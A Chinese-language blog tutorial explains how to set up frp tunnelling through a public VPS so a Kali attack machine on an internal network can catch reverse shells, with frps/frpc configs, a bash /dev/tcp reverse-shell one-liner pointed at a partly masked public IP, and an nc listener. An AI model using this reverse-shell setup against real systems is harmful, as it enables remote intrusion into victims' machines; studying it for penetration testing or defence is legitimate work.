Table of Contents

前言:

很多时候kali都是处于我们内网的情况下,同时我们也知道,如果我们要进行反弹shell的话是一定要知道公网ip的,那么如何使得受害主机能正常反弹shell,同时我们的kali可以接受到信息呢

正文:

frp是一款非常流行的内网穿透工具,我们这里就要利用frp来进行内网穿透。

首先我们确定一下我们需要做什么

我们需要一台公网ip的服务器来当作我们的frp服务器

kali 我们的攻击机 处于内网环境中

https://github.com/fatedier/frp

首先我们去frp的github链接分别下载到我们的公网vps上和我们的kali上

首先来搭建我们的frp服务器,过程也非常简单:

首先将压缩包进行一个压缩

tar -zxvf frp_0.33.0_linux_amd64.tar.gz

解压之后的文件夹内容如下

image-20200527122231040

可以看到里面有两个一个是frpc 一个是frps

frpc 就代表着 frp client

frps 就代表着 frp server

我们先搭建我们的服务器,所以也就是frps

vim frps.ini

内容就是

[common]
bind_port=7000

我们不需要进行修改,这里代表的就是我们运行frp这个服务的端口是7000

然后我们运行命令

./frps -c ./frps.ini

运行我们的frp服务

image-20200527122636041

接下来配置我们的frp客户端

image-20200527122752403

第一个红框是我们之前搭建的frp服务器的 ip

第二个就是我们kali的ip

local_port 就是我们kali后面监听的端口

Remote_port = 1234 就是我们frp服务器上的端口

运行本地客户端

./frpc -c ./frpc.ini

image-20200527123031658

我们在反弹shell的过程中地址是 公网ip

bash -i >& /dev/tcp/134.175.xxx.xxx/1234 0>&1

我们的frp服务器的1234 接受到我们的请求之后 会根据配置文件转发到我们kali的4444端口上

然后kali本地监听 4444 端口

这样反弹shell就可以成功了

image-20200527123149080

然后kali上监听 nc -lvvp 4444

image-20200527123240512

成功执行命令

image-20200527123330630

然后我们的frp服务器上也显示了对应的日志

发表评论

电子邮件地址不会被公开。 必填项已用*标注